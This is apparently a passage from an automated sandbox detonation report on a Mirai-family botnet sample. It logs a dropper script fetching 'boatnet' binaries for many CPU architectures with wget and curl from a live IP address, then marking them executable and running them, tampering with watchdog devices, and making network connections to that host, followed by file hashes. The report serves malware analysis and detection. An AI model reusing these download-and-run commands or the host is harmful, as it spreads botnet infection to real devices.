| File opened for reading | /proc/869/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/893/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/706/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/874/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/892/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/806/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/789/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/817/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/898/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/678/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/875/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/904/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/414/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/823/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/881/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/711/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
memory/747-1-0x00400000-0x00451a58-memory.dmp
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
debian9-mipsel-20240418-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/896/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/659/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/712/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/665/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/686/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/700/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/706/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/842/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/411/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/870/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/663/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/708/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/705/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/879/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/883/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/897/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
